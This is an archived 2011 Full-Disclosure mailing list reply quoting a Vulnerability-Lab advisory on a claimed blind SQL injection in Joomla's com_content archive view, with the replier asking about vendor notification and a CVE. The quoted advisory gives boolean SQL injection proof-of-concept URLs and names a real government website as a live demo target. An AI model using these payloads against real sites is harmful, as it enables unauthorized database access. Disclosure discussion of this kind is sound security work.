lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <20111113190623.GB6611@foo.fgeek.fi>
Date: Sun, 13 Nov 2011 21:06:23 +0200
From: Henri Salo <henri@...v.fi>
To: full-disclosure@...ts.grok.org.uk
Cc: research@...nerability-lab.com
Subject: Re: Joomla Component (com_content) - Blind SQL
 Injection Vulnerability

On Sat, Nov 12, 2011 at 12:35:35AM +0100, research@...nerability-lab.com wrote:
> Title:
> ======
> Joomla Component (com_content) -  Blind SQL Injection Vulnerability
> 
> 
> Date:
> =====
> 2011-11-11
> 
> 
> References:
> ===========
> http://www.vulnerability-lab.com/get_content.php?id=323
> 
> 
> VL-ID:
> =====
> 323
> 
> 
> Introduction:
> =============
> Joomla is a free and open source content management system (CMS) for publishing content on
> the World Wide Web and intranets and a model–view–controller (MVC) Web application framework
> that can also be used independently.
> Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design
> patterns[citation needed], stores data in a MySQL database, and includes features such as page
> caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support
> for language internationalization.
> Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been
> more than 21 million downloads. There are over 7,400 free and commercial extensions available
> from the official Joomla! Extension Directory and more available from other sources
> 
> (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Joomla!)
> 
> 
> Abstract:
> =========
> A vulnerability laboratory researcher discovered a Blind SQL Injection vulnerability on the com_content component of the joomla CMS.
> 
> 
> Status:
> ========
> Published
> 
> 
> Exploitation-Technique:
> =======================
> Remote
> 
> 
> Severity:
> =========
> Critical
> 
> 
> Details:
> ========
> A blind SQL Injection vulnerability was detected on the com_content component of the joomla CMS.
> The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected application dbms.
> Successful exploitation of the vulnerability can result in compromise of the affected application dbms.
> 
> Vulnerable Module(s):
> 					                  [+] com_content
> 
> 
> Proof of Concept:
> =================
> The vulnerability can be exploited be remote attackers. For demonstration or reproduce ...
> 
> 1: [Site]/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI]     
>                                                                                 
> 2: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=1--   
>                                                                                 
> 3: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=0--   
> 
> 
> [x] Demo :
> 
> http://www.paul.house.gov/index.php?option=com_content&view=archive&year=-1 or 1=0--
> 
> 
> Risk:
> =====
> The security risk of the blind sql injection vulnerability is estimated as critical.
> 
> 
> Credits:
> ========
> E.Shahmohamadi  (IRAN)
> 
> 
> Disclaimer:
> ===========
> The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
> either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
> profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
> states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
> may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
> Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of 
> other media, are reserved by Vulnerability-Lab or its suppliers.
> 
>     						Copyright © 2011|Vulnerability-Lab
> 
> -- 
> Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
> Contact: admin@...nerability-lab.com or support@...nerability-lab.com

Did you report this to Joomla? Have you asked CVE ID?

Best regards,
Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ